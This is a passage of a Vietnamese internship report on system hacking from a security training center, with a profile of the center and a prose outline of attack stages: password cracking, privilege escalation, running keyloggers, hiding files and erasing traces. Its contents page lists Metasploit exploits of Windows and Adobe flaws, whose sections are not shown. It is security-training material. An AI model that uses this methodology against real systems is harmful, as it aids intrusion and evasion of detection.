bao cao thuc tap athena

50
Thành phHChí Minh, tháng 6 năm 2015 TRUNG TÂM ĐÀO TẠO QUN TRMNG VÀ AN NINH MNG QUC TATHENA BÁO CÁO THC TP Đề tài : Nghiên cu tn công lhng hthng - System hacking Người HD: Thy Võ Đỗ Thng SVTH: Trần Đăng Khoa

Upload: au-duong-binh

Post on 18-Aug-2015

24 views

Category:

Technology


0 download

TRANSCRIPT

Thành phố Hồ Chí Minh, tháng 6 năm 2015

TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ AN NINH

MẠNG QUỐC TẾ ATHENA

BÁO CÁO THỰC TẬP

Đề tài : Nghiên cứu tấn công lỗ hổng hệ thống -

System hacking

Người HD: Thầy Võ Đỗ Thắng

SVTH: Trần Đăng Khoa

MỤC LỤC

NHẬN XÉT TỪ PHÍA TRUNG TÂM ........................................................................... 1

CHÚ THÍCH CÁC TỪ VIẾT TẮT VÀ THUẬT NGỮ ................................................. 2

LỜI MỞ ĐẦU ................................................................................................................. 3

CHƯƠNG 1: GIỚI THIỆU VỀ TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG VÀ

AN NINH MẠNG QUỐC TẾ ATHENA ....................................................................... 5

1.Tổng quan về trung tâm: ............................................................................................. 5

2.Lĩnh vực hoạt động chính: .......................................................................................... 5

3.Quá trình hình thành và phát triển: ........................................................................... 6

3.1. Quá trình hình thành: ..................................................................................... 6

3.2. Quá trình phát triển: ....................................................................................... 6

4.Cơ cấu tổ chức: ............................................................................................................ 7

Hình 1: cơ cấu tổ chức hành chánh của trung tâm .......................................................... 7

5.Lộ trình đào tạo: .......................................................................................................... 8

Hình 2: Lộ trình đào tạo tại trung tâm ............................................................................. 8

6.Chiến lược xúc tiến: .................................................................................................... 8

Hình 3: Sơ đồ xúc tiến chiến lược phát triển của trung tâm ............................................ 8

7.Đội ngũ nhân sự: ......................................................................................................... 9

8.Cơ sở vật chất: ............................................................................................................. 9

9.Dịch vụ hổ trợ: ............................................................................................................. 9

10.Thông tin liên hệ: .................................................................................................... 10

Kết luận chương 1: ....................................................................................................... 10

CHƯƠNG 2: ĐÁNH GIÁ QUÁ TRÌNH THỰC TẬP ................................................ 11

1.Kết quả đạt được trong quá trình thực tập:.............................................................. 11

2.Thuận lợi khó khăn trong quá trình thực tập: ......................................................... 12

Kết luận chương 2: ....................................................................................................... 12

CHƯƠNG 3: NỘI DUNG NGHIÊN CỨU TRONG QUÁ TRÌNH THỰC TẬP ....... 13

1.Giới thiệu tổng quan về đề tài nghiên cứu: .............................................................. 13

1.1. Tên đề tài nghiên cứu: ................................................................................... 13

1.2. Tình hình an ninh mạng hiện nay: ............................................................... 13

1.3. Giới thiệu system hacking: ............................................................................ 13

1.4. Quy trình tấn công vào hệ thống: ................................................................. 13

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

2

Hình 4: Các công đoạn tấn công hệ thống ..................................................................... 14

1.5. Giới thiệu các lỗ hổng thường xuyên bị tấn công: ...................................... 15

1.6. Công cụ sử dụng tấn công: ............................................................................ 16

1.6.1. Hệ điều hành Backtrack 5 r3: ................................................................ 16

Hình 5: Giao diện sử dụng của backtrack 5 r3 .............................................................. 16

1.6.2. Ettercap: ................................................................................................... 18

1.6.3. Nmap (Network Mapper) và Nessus: .................................................... 18

1.6.4. Metasploit: ............................................................................................... 19

1.6.5. Máy chủ ảo (Virtual Private Server - VPS): ......................................... 19

2.Khai thác xâm nhập hệ thống trong mạng LAN: .................................................... 20

2.1. Sơ đồ tổng quan hệ thống mạng LAN: ........................................................ 20

Hình 6: Sơ đồ hệ thống mạng LAN ............................................................................... 20

2.2. Tiến hành tấn công và khai thác lỗ hổng: .................................................... 20

2.2.1. Xâm nhập và khai thác lỗ hổng MS10_090: ......................................... 20

Hình 7: Sơ đồ tấn công ms10_090 ................................................................................ 21

Hình 8: giao diện khởi động của metasploit .................................................................. 21

Hình 9: đường dẫn module ms10_090 .......................................................................... 22

Hình 10: sử dụng module ms10_090 ............................................................................. 22

Hình 11: Xem các thuộc tính của module ms10_090 .................................................. 22

Hình 12: thiết lập các thuộc tính cho module ms10_090 .............................................. 23

Hình 13: đường link dẫn tới máy Attacker .................................................................... 23

Hình 14: máy Victim truy cập vào đường link .............................................................. 23

Hình 15: mở phiên kết nối tới máy Victim ................................................................... 23

Hình 16: truy cập vào phiên vừa mở ............................................................................. 24

Hình 17: thông tin máy Victim ...................................................................................... 24

2.2.2. Xâm nhập và khai thác lỗ hổng MS10_042 có che dấu đánh lừa máy

nạn nhân: ............................................................................................................... 24

Hình 18: Sơ đồ tấn công mã lỗi ms10_042 ................................................................... 25

Hình 19: Vào thư mục Ettercap ..................................................................................... 25

Hình 20: trỏ DNS đến IP Attacker ................................................................................ 25

Hình 21: Link URL máy Attacker ................................................................................. 26

Hình 22: Màn hình khởi động Ettercap ......................................................................... 26

Hình 23: Tìm kiếm các host trong mạng ....................................................................... 27

Hình 24: Danh sách host trong mạng ............................................................................ 27

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

3

Hình 25: giả mạo địa chỉ Attacker thành địa chỉ router ................................................ 27

Hình 26: địa chỉ MAC của máy Attacker ...................................................................... 28

Hình 27: địa chỉ router sau khi thay đổi ........................................................................ 28

Hình 28: mở một phiên điều khiển máy Victim ............................................................ 28

Hình 29: thông tin máy Victim ...................................................................................... 28

2.2.3. Xâm nhập và khai thác lỗ hổng MS12_027: ........................................ 29

Hình 30: Sơ đồ tấn công mã lỗi ms12_027 ................................................................... 29

Hình 31: đường dẫn đến file bị nhiễm độc .................................................................... 29

Hình 32: Thiết lập handler lắng nghe kết nối từ Victim ............................................... 30

Hình 33: Victim truy cập file nhiễm độc ....................................................................... 30

Hình 34: Mở phiên điều khiển máy Victim ................................................................... 30

Hình 35: thông tin máy Victim ...................................................................................... 30

2.3. Giải pháp hạn chế tấn công trong mạng LAN: ........................................... 31

3.Xây dựng hệ thống Honeypot khai thác xâm nhập hệ thống từ xa qua internet: .. 31

3.1. Giới thiệu về Honeypot: ................................................................................. 31

3.2. Sơ đồ tổng quan sử dụng honeypot: ............................................................. 32

Hình 36: Sơ đồ tổng quan tấn công trên Internet .......................................................... 32

3.3. Xâm nhập và khai thác lỗi hổng Adobe reader 9.2 qua internet: ............. 32

3.3.1. Giới thiệu lỗ hổng adobe reader 9.2: ..................................................... 32

3.3.2. Cách thức tấn công và khai thác lỗ hổng: ............................................. 33

Hình 37: Sơ đồ tấn công lỗ hổng adobe trên internet .................................................... 33

3.3.3. Quá trình tấn công lỗ hổng adobe reader 9.2: ...................................... 33

Hình 38: Giao diện khởi động metasploit frameword ................................................... 33

Hình 39: Tìm kiếm modul lỗi adobe reader 9.2 ............................................................ 34

Hình 40: Sử dụng modul adobe tìm được ..................................................................... 34

Hình 41: kiểm tra các thuộc tính của modul lỗi ............................................................ 34

Hình 42: Set các giá trị cho modul lỗi ........................................................................... 34

Hình 43: Đường dẫn file pdf bị tiêm nhiễm .................................................................. 35

Hình 44: thiết lập giá trị handler lắng nghe kết nối ....................................................... 35

Hình 45: mở phiên kết nối tới máy nạn nhân ................................................................ 35

3.4. Giải pháp hạn chế tấn công qua internet: ................................................... 35

Kết luận chương 3: ....................................................................................................... 35

KẾT LUẬN.................................................................................................................... 36

PHỤ LỤC ...................................................................................................................... 37

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

4

PHỤ LỤC 1: Đăng kí VPS free .................................................................................. 37

PHỤ LỤC 2: Cài đặt Metasploit Framework trên VPS .......................................... 40

PHỤ LỤC 3: Sử dụng Nmap và Nessus..................................................................... 44

DANH MỤC TÀI LIỆU THAM KHẢO ...................................................................... 45

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

1

NHẬN XÉT TỪ PHÍA TRUNG TÂM

…………………………………………………………………………………………

…………………………………………………………………………………………

…………………………………………………………………………………………

……………………………………………………………………………………….

…………………………………………………………………………………………

…………………………………………………………………………………………

……………………………………………………………………………………….

…………………………………………………………………………………………

…………………………………………………………………………………………

……………………………………………………………………………………….

…………………………………………………………………………………………

…………………………………………………………………………………………

……………………………………………………………………………………….

…………………………………………………………………………………………

…………………………………………………………………………………………

……………………………………………………………………………………….

…………………………………………………………………………………………

…………………………………………………………………………………………

……………………………………………………………………………………….

…………………………………………………………………………………………

…………………………………………………………………………………………

……………………………………………………………………………………….

…………………………………………………………………………………………

…………………………………………………………………………………………

……………………………………………………………………………………….

…………………………………………………………………………………………

…………………………………………………………………………………………

…………………………………………………………………….............................

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

2

CHÚ THÍCH CÁC TỪ VIẾT TẮT VÀ THUẬT NGỮ

Hacker Là người lập trình viên giỏi

Attacker Kẻ tấn công

Victim Nạn nhân

CNTT Công nghệ thông tin

CEH Certified Ethical Hacker(chứng chỉ hacker mũ trắng)

SME Small and medium enterprise(doanh nghiệp vừa và nhỏ)

AEH Chứng chỉ hacker mũ trắng Athena

LAN Local Area Network (mạng cục bộ)

VPS Virtual Private Server (máy chủ ảo)

SNMP Simple Network Management Protocol(Tập hợp các giao thức)

HĐH Hệ điều hành

RFID Radio Frequency Identification (Nhận dạng tần số sóng vô tuyến)

ARP Address Resolution Protocol (giao thức phân giải địa chỉ động)

MAC Media Access Control hay Medium Access Control

IP Internet Protocol ( giao thức internet)

MITM Man in the middle

DNS Domain Name System ( phân giải tên miền)

NMAP Network Mapped

CSS Cascading Style Sheet ( ngôn ngữ lập trình web)

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

3

LỜI MỞ ĐẦU

Theo thống kê của công ty Bkav, từ đầu năm 2013 đến nay, tại Việt Nam đã có

2.405 website của các cơ quan, doanh nghiệp bị xâm nhập, trung bình mỗi tháng có

khoảng 300 website bị tấn công. Ông Vũ Ngọc Sơn, Phó chủ tịch phụ trách Nghiên

cứu phát triển của Bkav cho biết, các cơ quan doanh nghiệp bị tấn công gần như là đầy

đủ, từ ít nghiêm trọng đến nghiêm trọng và rất nghiêm trọng (nhằm đánh cắp các tài

liệu mật) và các mã độc này nhắm cả vào Bộ Công An, Bộ Quốc phòng, ngân hàng,

các cơ quan đơn vị nghiên cứu, các doanh nghiệp…Theo nhìn nhận của Bkav, đã có

những chiến dịch tấn công, phát tán mã độc có chủ đích vào Việt Nam. Trong đó, bản

thân các vụ tấn công trên mạng và các vụ xâm nhập hệ thống công nghệ thông tin là

nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản, cạnh tranh không lành mạnh

và một số vụ mất an toàn thông tin số khác đang gia tăng ở mức báo động về số lượng,

đa dạng về hình thức, tinh vi hơn về công nghệ.

Trước tình hình đó, song song việc ban hành chỉ thị 897/CT-TTg, Thủ Tướng chỉ

đạo các Bộ, ngành, địa phương tăng cường giải pháp đảm bảo an toàn thông tin số.

Thủ tướng Chính phủ cũng đã nêu rõ, trong thời gian qua, tình hình mất an toàn thông

tin số ở nước ta diễn biến phức tạp, xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến

việc ứng dụng công nghệ thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc

phòng, an ninh.

Trong tình hình đó việc đào tạo ra nguồn nhân lực có trình độ cao về công nghệ

thông tin là điều cấp bách và quan trọng hơn hết. Trung tâm đào tạo quản trị mạng và

an ninh mạng là một trong những trung tâm đào tạo sinh viên và cung cấp nguồn nhân

lực để đáp ứng xu thế hiện nay.

Bằng những kiến thức đã được học và quá trình học hỏi tích lũy kiến thức từ các

giảng viên ở trung tâm, tôi đã chọn đề tài : “ Nghiên cứu tấn công lỗi hệ thống –

System hacking” làm báo cáo thực tập doanh nghiêp.

Bài báo cáo này trình bày hai vấn đề chính là:

Phần 1: Trình bày sơ lược về trung tâm đào tạo quản trị mạng và an ninh mạng quốc

tế Athena.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

4

Phần 2: Giới thiệu tổng quát về các phương pháp mà Hacker sử dụng để tấn công

xâm nhập và khai thác vào các phiển bản hệ điều hành Windows, hệ điều hành phổ

biến nhất hiện nay tại Việt Nam, từ đó giúp chúng ta nắm rõ cách thức mà Hacker sử

dụng và đưa ra các giải pháp giúp cho mỗi người dùng được an toàn thông tin, bảo mật

trong thời đại Internet ngày nay.

Nội dung bài viết:

- Lời mở đầu

- Chương 1: Giới thiệu về trung tâm đào tạo quản trị mạng và an ninh mạng quốc

tế Athena

- Chương 2: Đánh giá quá trình thực tập

- Chương 3: Nội dung nghiên cứu trong quá trình thực tập

- Kết luận

Ứng dụng bài viết:

Qua bài báo cáo, người sử dụng hệ thống sẽ có các biện pháp phòng chống các

cuộc tấn công, các doanh nghiệp hoặc nhà quản trị có thể đưa ra các chính sách phòng

chống tấn công cũng như bảo vệ tài nguyên của hệ thống mình.

Với vốn kiến thức còn hạn chế cũng như việc tiếp cận thực tiễn còn nhiều trở

ngại nên bài báo cáo này không tránh khỏi những sai sót, khiếm khuyết. Vì vậy em rất

mong nhận được những góp ý từ phía thầy và các anh chị nhân viên tại trung tâm đào

tạo quản trị mạng và an ninh mạng quốc tế Athena.

Qua đây, em xin gửi lời cảm ơn sâu sắc đến thầy Võ Đỗ Thắng đã truyền dạy cho

em nhiều kiến thức bổ ích, hỗ trợ em tận tình, giúp em có đủ hành trang để hỗ trợ cho

công việc sau này.

Bên cạnh đó, em cũng xin gửi lời cảm ơn đến trung tâm cùng toàn thể các anh

chị nhân viên, giảng viên tại trung tâm Athena đã luôn tận tình chỉ bảo và giúp đỡ em

rất nhiều để em có thể hoàn thành tốt bài báo cáo của mình.

Em xin gửi đến thầy và các anh chị lời chúc sức khỏe và thành đạt!

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

5

CHƯƠNG 1: GIỚI THIỆU VỀ TRUNG TÂM ĐÀO TẠO QUẢN TRỊ MẠNG

VÀ AN NINH MẠNG QUỐC TẾ ATHENA

Chương 1 sẽ giới thiệu khái quát về trung tâm và tình hình hoạt động của trung

tâm trong những năm gần đây. Bên cạch đó còn đưa ra những đánh giá hoạt động

chung về trung tâm đào tạo quản trị mạng và an ninh mạng quốc tế Athena.

1. Tổng quan về trung tâm:

ATHENA được thành lập năm 2004, là một tổ chức qui tụ nhiều trí thức Việt

Nam đầy năng động, nhiệt huyết và kinh nghiệm trong lĩnh vực CNTT, với tâm huyết

góp phần vào công cuộc thúc đẩy tiến trình đưa công nghệ thông tin là ngành kinh tế

mũi nhọn, góp phần phát triển nước nhà .

2. Lĩnh vực hoạt động chính:

Trung tâm ATHENA đã và đang tập trung chủ yếu vào đào tạo, tư vấn, cung

cấp nhân lực chuyên sâu trong lĩnh vực quản trị mạng, an ninh mạng, thương

mại điện tử, truyền thông xã hội ( social Network) theo các tiêu chuẩn quốc tế

của các hãng nổi tiếng như Microsoft, Cisco, Oracle, Linux LPI , CEH,... Song

song đó, trung tâm ATHENA còn có những chương trình đào tạo cao cấp dành

riêng theo đơn đặt hàng của các đơn vị như Bộ Quốc Phòng, Bộ Công An ,

ngân hàng, doanh nghiệp SME, các cơ quan chính phủ, tổ chức tài chính..

Sau hơn 10 năm hoạt động, nhiều học viên tốt nghiệp trung tâm ATHENA đã là

chuyên gia đảm nhận công tác quản lý hệ thống mạng, an ninh mạng, quản lý hệ

thống kinh doanh Online (Internet Business) cho nhiều bộ ngành như Cục Công

Nghệ Thông Tin - Bộ Quốc Phòng , Bộ Công An, Sở Thông Tin Truyền Thông

các tỉnh, Sở Thương Mại, doanh nghiệp SME.....

Bên cạnh đó, Trung tâm ATHENA còn có nhiều chương trình hợp tác và trao

đổi công nghệ với nhiều đại học lớn như đại học Bách Khoa Thành Phố Hồ Chí

Minh, Học Viện An Ninh Nhân Dân( Thủ Đức), Học Viện Bưu Chính Viễn

Thông, Hiệp hội an toàn thông tin (VNISA), Viện Kỹ Thuật Quân Sự ,......

Song song với các hoạt động đào tạo, Trung tâm ATHENA còn tham gia tư vấn

ứng dụng công nghệ vào nâng cao năng suất lao động và cung cấp nhân sự cho

hàng ngàn doanh nghiệp SME ( khối doanh nghiệp vừa và nhỏ). Hoạt động này

được cộng đồng doanh nghiệp đánh giá rất cao, mang lại lợi ích thiết thực,

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

6

doanh nghiệp vừa được tư vấn công nghệ vừa tìm được nguồn nhân lực phù hợp

cho hoạt động kinh doanh. Đây cũng là cơ sở để các học viên tốt nghiệp

ATHENA luôn có việc làm theo đúng yêu cầu xã hội.

3. Quá trình hình thành và phát triển:

3.1. Quá trình hình thành:

Năm 2000, một nhóm các thành viên là những doanh nhân tài năng và

thành công trong lĩnh vực công nghệ thông tin đã nhận ra tiềm năng phát

triển của việc đào tạo nền công nghệ thông tin nước nhà. Họ là những cá

nhân có trình độ chuyên môn cao và có đầu óc lãnh đạo cùng với tầm nhìn

xa về tương lai của ngành công nghệ thông tin trong tương lai, họ đã quy tụ

được một lực lượng lớn đội ngũ công nghệ thông tin trước hết là làm nhiệm

vụ ứng cứu máy tính cho các doanh nghiệp, cá nhân có nhu cầu. Bước phát

triển tiếp theo là vươn tầm đào đạo đội ngũ cán bộ công nghệ thông tin cho

đất nước và xã hội.

Các thành viên sáng lập trung tâm gồm:

Ông Nguyễn Thế Đông: Cựu giám đốc trung tâm ứng cứu máy tính

Athena, hiện tại là giám đốc dự án của công ty Siemen Telecom.

Ông Hứa Văn Thế Phúc: Phó Giám đốc Phát triển Thương mại Công ty

EIS, Phó Tổng công ty FPT.

Ông Nghiêm Sỹ Thắng: Phó Tổng giám đốc Ngân hàng Liên Việt, chịu

trách nhiệm công nghệ thông tin của Ngân hàng.

Ông Võ Đỗ Thắng: Hiện đang là giám đốc Trung tâm đào tạo quản trị và

an ninh mạng Athena.

Đến năm 2003, bốn thành viên sáng lập cùng với với đội ngũ ứng cứu máy

tính gần 100 thành viên hoạt động như là một nhóm, một tổ chức ứng cứu

máy tính miền Nam.

3.2. Quá trình phát triển:

Đến năm 2008: Hàng loạt các trung tâm đào tạo quản trị và an ninh mạng

mọc lên, cùng với khủng hoảng kinh tế tài chính toàn cầu đã làm cho Trung

tâm rơi vào nhiều khó khăn. Ông Nguyễn Thế Đông cùng Ông Hứa Văn

Thế Phúc rút vốn khỏi công ty gây nên sự hoang man cho toàn bộ hệ thống

trung tâm. Cộng thêm chi nhánh tại Cư xã Nguyễn Văn Trỗi hoạt động

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

7

không còn hiệu quả phải đóng cửa làm cho trung tâm rơi từ khó khăn này

đến khó khăn khác.

Lúc này, với quyết tâm khôi phục lại công ty cũng như tiếp tục sứ mạng

góp phần vào tiến trình tin học hóa của đất nước. Ông Võ Đỗ Thắng mua

lại cổ phần của hai nhà đầu tư lên làm giám đốc và xây dựng lại trung tâm.

Đây là một bước chuyển mình có ý nghĩa chiến lược của trung tâm. Mở ra

một làn gió mới và một giai đoạn mới, cùng với quyết tâm mạnh mẽ và một

tinh thần thép đã giúp ông Thắng vượt qua nhiều khó khăn ban đầu, giúp

trung tâm đứng vững trong thời kì khủng hoảng.

Từ năm 2009 – nay: Cùng với sự lãnh đạo tài tình và đầu óc chiến lược.

Trung tâm đào tạo quản trị và an ninh mạng dần được phục hồi và trở lại

quỹ đạo hoạt động của mình. Đến nay, Trung tâm đã trở thành một trong

những trung tâm đào tạo quản trị mạng hàng đầu Việt Nam. Cùng với sự

liên kết của rất nhiều công ty, tổ chức doanh nghiệp, trung tâm trở thành nơi

đào tạo và cung cấp nguồn nhân lực công nghệ thông tin cho xã hội. Từng

bước thực hiện mục tiêu góp phần vào tiến trình tin học hóa nước nhà.

4. Cơ cấu tổ chức:

Hình 1: cơ cấu tổ chức hành chánh của trung tâm

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

8

5. Lộ trình đào tạo:

Hình 2: Lộ trình đào tạo tại trung tâm

6. Chiến lược xúc tiến:

Hình 3: Sơ đồ xúc tiến chiến lược phát triển của trung tâm

Xác định mục

tiêu

Mục tiêu

truyền thông

Mục tiêu tiêu

thụ

Quyết định

thông điệp

Hình thành

thông điệp

Đánh giá

thông điệp

và lựa chọn

thông điệp

Thực hiện

thông điệp

Đánh giá

quảng cáo.

Tác dụng

truyền thông

Tác dụng đến

mức tiêu thụ

Quyết định

phương tiện

Phạm vi, tần

suất, tác

động

Các kiểu

phương tiện

chính

Quyết định

ngân sách

Căn cứ vào

khả năng Phần

trăm doanh số

bán

Cân bằng cạnh

tranh

Căn cứ mục

tiêu và nhiệm

vụ

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

9

7. Đội ngũ nhân sự:

Tất cả các giảng viên, chuyên viên trung tâm ATHENA đều là các chuyên gia

trong lĩnh vực quản trị mạng, an ninh mạng, phát triển thương mại điện tử, kinh

doanh trên Internet với nhiều năm kinh nghiệm. Bên cạnh công tác giảng dạy,

các giảng viên thường xuyên tham gia các dự án tư vấn, triển khai công nghệ tại

doanh nghiệp với mục đích đưa kiến thức công nghệ vào phát triển kinh tế và

cập nhật những biến đổi thường xuyên của xã hội để đưa vào chương trình

giảng dạy.

Phương châm hoạt động của đội ngũ giảng viên ATHENA là "Luôn Luôn Sáng

Tạo Để Đáp Ứng Nhu Cầu Xã Hội".

8. Cơ sở vật chất:

Thiết bị đầy đủ và hiện đại.

Chương trình cập nhật liên tục, bảo đảm học viên luôn tiếp cận với những công

nghệ mới nhất.

9. Dịch vụ hổ trợ:

Đảm bảo việc làm cho học viên tốt nghiệp.

Giới thiệu việc làm cho mọi học viên.

Thực tập có lương cho học viên đáp ứng được yêu cầu.

Ngoài giờ học chính thức, học viên được thực hành thêm miễn phí, không giới

hạn thời gian.

Hỗ trợ kỹ thuật không thời hạn trong tất cả các lĩnh vực liên quan đến máy tính,

mạng máy tính, bảo mật mạng, phát triển Internet Business.

Hỗ trợ thi Chứng chỉ Quốc tế.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

10

10. Thông tin liên hệ:

Địa chỉ:

- 92 Nguyễn Đình Chiểu, phường Đa Kao, Quận1, Tp HCM. (Gần ngã tư

Đinh Tiên Hoàng - Nguyễn Đình Chiểu).

Điện thoại: 094 320 00 88 - 094 323 00 99-(08)38244041-(08)22103801

- Chi nhánh Hà Nội: C2T13, tòa nhà TopCare, 335 Cầu Giấy, Hà Nội.

Điện thoại: (04)38.39.82.14 – 0919119196.

- Website: http://athena.edu.vn - http://athena.com.vn

- E-mail : [email protected] - [email protected]

- Facebook : http://facebook.com/trungtamathena.

Kết luận chương 1:

Chương 1 đã giới thiệu đôi nét về trung tâm đào tạo quản trị mạng và an ninh

mạng quốc tế Athena. Trình bày được cơ cấu tổ chức, qui trình làm việc cũng như các

hoạt động chính mà trung tâm đang thực hiện. Từ đó có thể đưa ra những đánh giá và

các mặt hạn chế của trung tâm .

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

11

CHƯƠNG 2: ĐÁNH GIÁ QUÁ TRÌNH THỰC TẬP

Chương 2 sẽ trình bày những nhận định, đánh giá của bản thân sinh viên về

những gì mình thu thập được, những kinh nghiệm tích lũy trong quá trình làm việc.

1. Kết quả đạt được trong quá trình thực tập:

Kiến thức :

Kiến thức về tấn công hệ thống, các lỗ hổng hệ thống, cách khắc phục, cách

sử dụng, quản lý hệ thống VPS, xây dựng web server, đưa ra các giải pháp.

Kĩ năng :

Kĩ năng thuyết trình, trình bày báo cáo.

Kĩ năng giao tiếp, nói chuyện với khách hàng.

Kĩ năng làm việc nhóm, phối hợp nhóm, phân chia công việc hiệu quả.

Kĩ năng tìm hiểu tài liệu mới, ứng dụng đề tài nghiên cứu.

Kinh nghiệm thực tiễn:

Tiếp cận với môi trường làm việc năng động sáng tạo, không ngừng thay đổi.

Học hỏi được các kinh nghiệm từ giảng viên và nhân viên làm tại trung tâm.

Biết được qui trình làm việc, gặp gỡ giao tiếp với các khách hàng, đối tác.

Hiểu về cách thức quản lý một số hoạt động kinh doanh của trung tâm.

Kinh nghiệm khi làm việc độc lập, không nên hiểu từ độc lập ở đây là chỉ

làm một mình mà là làm một mình cùng với những người khác, làm một

mình nhưng vẫn theo một cái đã bàn bạc thảo luận trước và mỗi người phải

tự triển khai phần công việc của mình với những người khác cũng triển khai

công việc của họ.

Kinh nghiệm khi trình bày ý tưởng của mình với các đồng nghiệp mà ở đây

là các bạn trong nhóm trong trung tâm.

Kinh nghiệm khi tham gia vào các dự án lớn, một dự án lớn sẽ có nhiều

người tham gia và mỗi người một công việc khác nhau, cùng nhau làm việc

theo một sơ đồ khoa học được tổ chức trước.

Các kinh nghiệm khi xử lý các lỗi phát sinh trong quá trình làm việc là phải

bình tĩnh kiểm tra và vận dụng kiến thức được học để sửa lỗi.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

12

2. Thuận lợi khó khăn trong quá trình thực tập:

Thuận lợi:

Được sự hướng dẫn tận tình của Thầy và các nhân viên chính thức.

Được trung tâm tạo điều kiện tốt nhất trong suốt quá trình thực tập.

Cơ sở vật chất tại trung tâm rất tốt.

Lịch thực tập rất linh động và có thể thay đổi nếu báo trước.

Trung tâm hoạt động với nhiều lĩnh vực kinh doanh khác nhau, vốn kinh

nghiệm tích lũy được nhiều.

Khó khăn:

Chưa có nhiều kỹ năng mềm, kiến thức chuyên nghành còn hạn hẹp nên gặp

khó khăn trong việc nhận công việc cũng như trình bày ý tưởng của mình.

Lần đầu tiếp xúc với công nghệ mới, ngôn ngữ mới nên cảm thấy hoang man

và lo lắng về khả năng của bản thân.

Khi gặp các vấn đề mới, các lỗi phát sinh trong quá trình làm việc thì rất lúng

túng trong việc xử lý và thường là phải nhờ sự giúp đỡ của người hướng dẫn.

Kết luận chương 2:

Chương 2 đã nêu được những thông tin kiến thức mà sinh viên đã tích lũy được,

các kinh nghiệm thực tế từ quá trình thực hiện đề tài cũng như làm việc trong công ty.

Những bài học rút ra được từ các anh chị cũng như giảng viên tại trung tâm. Ngoài ra

cũng nêu ra được những thuận lợi, khó khăn trong quá trình thực tập.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

13

CHƯƠNG 3: NỘI DUNG NGHIÊN CỨU TRONG QUÁ TRÌNH THỰC TẬP

Chương 3 sẽ trình bày nội dung mà sinh viên đã nghiên cứu tìm hiểu trong quá

trình thực tập tại trung tâm. Những công nghệ mà sinh viên đã sử dụng, đồng thời

cũng đưa ra những nhận định đánh giá về tính thực tiễn của đề tài.

1. Giới thiệu tổng quan về đề tài nghiên cứu:

1.1. Tên đề tài nghiên cứu:

Tìm hiểu cách thức tấn công hệ thống mạng – system hacking và đưa ra giải

pháp hạn chế tấn công.

1.2. Tình hình an ninh mạng hiện nay:

Trong thời gian qua, tình hình mất an toàn thông tin số diễn biến phức tạp,

xuất hiện nhiều nguy cơ đe dọa nghiêm trọng đến việc ứng dụng công nghệ

thông tin phục vụ phát triển kinh tế - xã hội và đảm bảo quốc phòng, an ninh.

Trong đó, bản thân các vụ tấn công trên mạng và các vụ xâm nhập hệ thống

công nghệ thông tin là nhằm do thám, trục lợi, phá hoại dữ liệu, ăn cắp tài sản,

cạnh tranh không lành mạnh và một số vụ mất an toàn thông tin số khác đang

gia tăng ở mức báo động về số lượng, đa dạng về hình thức, tinh vi hơn về

công nghệ.

1.3. Giới thiệu system hacking:

System hacking bao gồm những kỹ thuật lấy username, password dựa vào

phần mềm cài trên hệ thống hoặc tính dễ cài đặt và chạy các dịch vụ từ xa của

hệ điều hành Windows. Nâng quyền trong hệ thống, sử dụng keyloger để lấy

thông tin, xóa những log file hệ thống. Một khi đã xâm nhập vào hệ thống,

Hacker có thể thực hiện mọi thứ trên máy tính đó, gây ra những hậu quả vô

cùng nghiêm trọng cho các cá nhân, tổ chức.

1.4. Quy trình tấn công vào hệ thống:

Quá trình tấn công hệ thống (System hacking) là bước tiếp theo sau quá

trình khảo sát, thu thập thông tin của mục tiêu cần tấn công bằng những kỹ

thuật như Footprinting, Social engineering, Enumeration, Google Hacking…

đã được áp dụng cho mục đích truy tìm thông tin.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

14

Các bước để tấn công, đánh sập nó, có thể được liệt kê như hình vẽ bên

cạnh. Nó gồm 6 công đoạn như sau:

Hình 4: Các công đoạn tấn công hệ thống

Enumerate (liệt kê): Trích ra tất cả những thông tin có thể về user trong

hệ thống. Sử dụng phương pháp thăm dò SNMP để có được những thông

tin hữu ích, chính xác hơn.

Crack: Công đoạn này có lẽ hấp dẫn nhiều Hacker nhất. Bước này yêu

cầu chúng ta bẻ khóa mật khẩu đăng nhập của user. Hoặc bằng một cách

nào khác, mục tiêu phải đạt tới là quyền truy cập vào hệ thống.

Escalste (leo thang): Nói cho dễ hiểu là chuyển đổi giới hạn truy cập từ

user bình thường lên admin hoặc user có quyền cao hơn đủ cho chúng ta

tấn công.

Execute (thực thi): Thực thi ứng dụng trên hệ thống máy đích. Chuẩn bị

trước malware, keylogger, rootkit…để chạy nó trên máy tính tấn công.

Hide (ẩn file): Những file thực thi, file soucecode chạy chương trình…

Cần phải được làm ẩn đi, tránh bị mục tiêu phát hiện tiêu diệt.

Tracks (dấu vết): Tất nhiên không phải là để lại dấu vết. Những thông tin

có liên quan đến bạn cần phải bị xóa sạch, không để lại bất cứ thứ gì. Nếu

không khả năng bạn bị phát hiện là kẻ đột nhập là rất cao.

Trần Đăng Khoa Tấn công lỗ hổng hệ thống - System Hacking

15

1.5. Giới thiệu các lỗ hổng thường xuyên bị tấn công:

Phần mềm máy tính ngày nay vô cùng phức tạp, bao gồm hàng ngàn dòng

mã. Phần mềm được viết ra bởi con người, nên cũng chẳng có gì lạ khi

